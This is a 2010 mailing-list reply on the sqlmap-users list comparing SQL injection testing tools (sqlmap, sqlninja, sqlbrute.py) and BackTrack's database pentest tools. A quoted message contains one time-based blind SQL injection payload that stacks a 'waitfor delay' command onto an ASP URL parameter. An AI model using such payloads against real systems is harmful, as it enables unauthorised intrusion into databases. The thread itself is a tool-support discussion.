Re: [sqlmap-users] hmm
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] hmm
|
From: David G. <sk...@gm...> - 2010-05-21 13:47:08
|
On Thu, May 20, 2010 at 9:20 AM, Bernardo Damele A. G. < ber...@gm...> wrote: > James, > > On Thu, May 20, 2010 at 12:30, <ja...@ev...> wrote: > > ... > > Have you noted that SQLMap misses a lot of vulns? Simple ones like > > > > windowsistrash.asp?id=1';waitfor delay '00:00:15' > > > > And also more complex POST vulns? I've been using SQLNinja on the advice > > > > of my friend Bert and it appears to pwn windoze better than SQLmap... > > ... > > As I said several times, sqlmap can detect only boolean-based blind > SQL injection at first. If and once it identifies this type of > injection, it can be used to test and exploit UNION query and stacked > queries. This is a design flaw which will be fixed in the upcoming > months. > We are eagerly waiting for it to become true!! >] > sqlninja is not able to detect the injection, you have to instruct it > where it is and how to exploit it in the sqlninja.conf file. It uses > only waitfor delay (time-based blind SQL injection) to enumerate very > little data, the only data needed to takeover it. This is why it "pwn > windoze better". > > Yes, sqlninja can collect just some infos from the database, like the version (2000/2005), database user, privs, etc.. It just a "pnwge" MSSQL tool. Also, icesurf(the developer) just released version 0.2.5 these days. I usually use the tools in backtrack for pententing databases (/pentest/dabase). For full-blind (time-based) sql injection as you need, I always use the tool "sqlbrute.py" with some modifications to suit my needs. Tools for pentesting databases, as available in backtrack, can be described on this page: http://itbreathes.com/?p=59 -- David Gomes Guimarães |
